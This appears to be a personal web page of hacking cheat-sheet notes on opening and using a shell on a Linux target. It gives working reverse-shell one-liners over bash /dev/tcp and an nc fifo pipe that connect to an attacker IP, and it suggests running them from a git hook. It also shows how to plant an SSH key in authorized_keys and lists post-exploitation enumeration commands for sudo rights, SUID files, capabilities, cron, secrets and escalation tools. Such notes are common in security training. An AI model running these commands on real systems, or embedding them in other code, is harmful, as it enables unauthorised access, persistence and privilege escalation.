Skip to main content
  1. Hacking/

Shell

Disclaimer: These are my personal notes, published "as-is" without warranty or guarantee of any kind. Use at your own risk. Licensed CC BY-NC-SA 4.0.

Establish a shell #

Check payloads all the things for commands.

Shell commands #

Can run from a script e.g. a git hook. May need a shebang header e.g. #!/bin/sh

bash -c 'bash -i >& /dev/tcp/10.10.10.10/1234 0>&1'
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.10 1234 >/tmp/f

Got a shell #

First commands to set up terminal #

python -c 'import pty; pty.spawn("/bin/bash")'

OR

export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/tmp
export TERM=xterm-256color`
alias ll='ls -lsaht --color=auto'

Ctrl + Z (make background process), then…

stty raw -echo ; fg ; reset
stty columns 200 rows 200

SSH session - authorized_keys #

mkdir -p .ssh
echo 'KEYHERE' | tee .ssh/authorized_keys

Check capabilities #

which gcc
which cc
which python
which perl
which wget
which curl
which nc
which ncat

Check arch #

file /bin/bash
uname -a
cat /etc/issue
cat /etc/*-release

User info #

sudo -l
ls -lsaht /etc/sudoers
groups <user>
env
cd /home
ls -lsaht
ls -lsaR /home/ # Looking for .ssh keys

Check web dir #

cd /var/www/html
ls -lsaht

SUID / GUID escalations #

https://gtfobins.github.io/

Find SUID #

find / -perm -u=s -type f 2>/dev/null

Find GUID #

find / -perm -g=s -type f 2>/dev/null

Extended capabilities #

getcap, setcap and file capabilities — insecure.ws

getcap -r / 2>/dev/null

Commands with capabilities may be restricted by Apparmor. ls /etc/apparmor.d/ to check

process spying #

  • Is there some script doing things that might be interesting?
  • Shows what’s recently run.
  • Keep it running to see if there are any periodic scripts.

https://github.com/DominicBreuker/pspy/blob/master/README.md

cd /var/tmp/

Transfer pspy

chmod 755 pspy

./pspy

Local network #

netstat -antup
netstat -tunlp

Root running anything? #

ps aux |grep -i 'root' --color=auto

Any interesting files? #

ls -lsaht /etc/
ls -lsaht /var/lib/
ls -lsaht /var/db/
ls -lsaht /opt/
ls -lsaht /tmp/
ls -lsaht /var/tmp/
ls -lsaht /dev/shm/

Anything other than root / shadow here?

cat /etc/fstab

Any config files left behind? #

ls -lsaht |grep -i ‘.conf’ --color=auto
ls -lsaht |grep -i ‘.secret’ --color=auto

Cron #

crontab –u root –l
cat /etc/crontab
ls /etc/cron.*

List all files #

Find all files created by a user:

find / -user miguel 2>/dev/null

Any mail? #

cd /var/mail/

ls -lsaht

Automated scripts #

  • LinPEAS
  • Traitor
  • searchsploit -m multiple/local/4713.sh copies the specified exploit to the local directory.

Other resources #